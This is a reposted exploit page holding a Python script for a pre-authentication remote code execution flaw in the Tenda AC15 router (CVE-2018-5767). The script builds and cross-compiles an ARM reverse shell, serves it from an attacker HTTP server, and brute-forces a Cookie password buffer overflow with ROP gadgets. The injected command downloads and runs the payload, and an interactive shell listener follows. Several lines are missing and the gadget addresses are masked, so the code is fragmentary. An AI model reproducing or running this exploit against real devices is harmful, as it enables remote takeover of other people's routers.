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Tenda AC15 Router - Pe-authenticated Remote Code Execution Exploit

Tim Carrington
Security Risk Critical
remote exploits
Date add
#!/usr/bin/env python
# EDB Note ~ Source: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/
import urllib2
import struct
import time
import socket
from optparse import *
import SimpleHTTPServer
import SocketServer
import threading
import sys
import os
import subprocess
"#include <sys/socket.h>\n"
"#include <sys/types.h>\n"
"#include <string.h>\n"
"#include <stdio.h>\n"
"#include <netinet/in.h>\n"
"int main(int argc, char **argv)\n"
"           struct sockaddr_in addr;\n"
"           socklen_t addrlen;\n"
"           int sock = socket(AF_INET, SOCK_STREAM, 0);\n"
"           memset(&addr, 0x00, sizeof(addr));\n"
"           addr.sin_family = AF_INET;\n"
"           addr.sin_port = htons(%d);\n"
"           addr.sin_addr.s_addr = inet_addr(\"%s\");\n"
"           int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n"
"           dup2(sock, 0);\n"
"           dup2(sock, 1);\n"
"           dup2(sock, 2);\n"
"           system(\"/bin/sh\");\n"
REV_PORT = 31337
DONE = False
* This function creates a listening socket on port
* REV_PORT. When a connection is accepted it updates
* the global DONE flag to indicate successful exploitation.
* It then jumps into a loop whereby the user can send remote
* commands to the device, interacting with a spawned /bin/sh
* process.
def threaded_listener():
            global DONE
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
            host = ("", REV_PORT)
                        print "[+] Error binding to %d" %REV_PORT
                        return -1
            print "[+] Connect back listener running on port %d" %REV_PORT
            conn, host = s.accept()
            #We got a connection, lets make the exploit thread aware
            DONE = True
            print "[+] Got connect back from %s" %host[0]
            print "[+] Entering command loop, enter exit to quit"
            #Loop continuosly, simple reverse shell interface.
            while True:
                        print "#",
                        cmd = raw_input()
                        if cmd == "exit":
                        if cmd == '':
                        conn.send(cmd + "\n")
                        print conn.recv(4096)
* Take the ARM_REV_SHELL code and modify it with
* the given ip and port to connect back to.
* This function then compiles the code into an
* ARM binary.
@Param comp_path – This should be the path of the cross-compiler.
@Param my_ip – The IP address of the system running this code.
def compile_shell(comp_path, my_ip):
            global ARM_REV_SHELL
            outfile = open("a.c", "w")
            ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)
            compile_cmd = [comp_path, "a.c","-o", "a"]
            s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
            while s.poll() == None:
            if s.returncode == 0:
                        return True
                        print "[x] Error compiling code, check compiler? Read the README?"
                        return False
* This function uses the SimpleHTTPServer module to create
* a http server that will serve our malicious binary.
* This function is called as a thread, as a daemon process.
def start_http_server():
            Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
            httpd = SocketServer.TCPServer(("", HTTPD_PORT), Handler)
            print "[+] Http server started on port %d" %HTTPD_PORT
* This function presents the actual vulnerability exploited.
* The Cookie header has a password field that is vulnerable to
* a sscanf buffer overflow, we make use of 2 ROP gadgets to
* bypass DEP/NX, and can brute force ASLR due to a watchdog
* process restarting any processes that crash.
* This function will continually make malicious requests to the
* devices web interface until the DONE flag is set to True.
@Param host – the ip address of the target.
@Param port – the port the webserver is running on.
@Param my_ip – The ip address of the attacking system.
def exploit(host, port, my_ip):
            global DONE
            url = "http://%s:%s/goform/exeCommand"%(host, port)
            i = 0
            command = "wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;" %(my_ip, HTTPD_PORT)
            #Guess the same libc base continuosly
            libc_base = ****
            curr_libc = libc_base + (0x7c << 12)
            system = struct.pack("<I", curr_libc + ****)
            #: pop {r3, r4, r7, pc}
            pop = struct.pack("<I", curr_libc + ****)
            #: mov r0, sp ; blx r3
            mv_r0_sp = struct.pack("<I", curr_libc + ****)
            password = "A"*offset
            password += pop + system + "B"*8 + mv_r0_sp + command + ".gif"
            print "[+] Beginning brute force."
            while not DONE:
                        i += 1                
                        print "[+] Attempt %d" %i
                        #build the request, with the malicious password field
                        req = urllib2.Request(url)                     
                        req.add_header("Cookie", "password=%s"%password)
                        #The request will throw an exception when we crash the server,
                        #we don't care about this, so don't handle it.
                                    resp = urllib2.urlopen(req)
                        #Give the device some time to restart the
            print "[+] Exploit done"
def main():
            parser = OptionParser()
            parser.add_option("-t", "–target", dest="host_ip", help="IP address of the target")
            parser.add_option("-p", "–port", dest="host_port", help="Port of the targets webserver")
            parser.add_option("-c", "–comp-path", dest="compiler_path", help="path to arm cross compiler")
            parser.add_option("-m", "–my-ip", dest="my_ip", help="your ip address")
            options, args = parser.parse_args()
            host_ip = options.host_ip
            host_port = options.host_port
            comp_path = options.compiler_path
            my_ip = options.my_ip
            if host_ip == None or host_port == None:
                        parser.error("[x] A target ip address (-t) and port (-p) are required")
            if comp_path == None:
                        parser.error("[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2")
            if my_ip == None:
                        parser.error("[x] Please pass your ip address (-m)")
            if not compile_shell(comp_path, my_ip):
                        print "[x] Exiting due to error in compiling shell"
                        return -1
            httpd_thread = threading.Thread(target=start_http_server)
            httpd_thread.daemon = True
            conn_listener = threading.Thread(target=threaded_listener)
            #Give the thread a little time to start up, and fail if that happens
            if not conn_listener.is_alive():
                        print "[x] Exiting due to conn_listener error"
                        return -1
            exploit(host_ip, host_port, my_ip)
            return 0
if __name__ == '__main__':

#  0day.today [2024-09-29]  #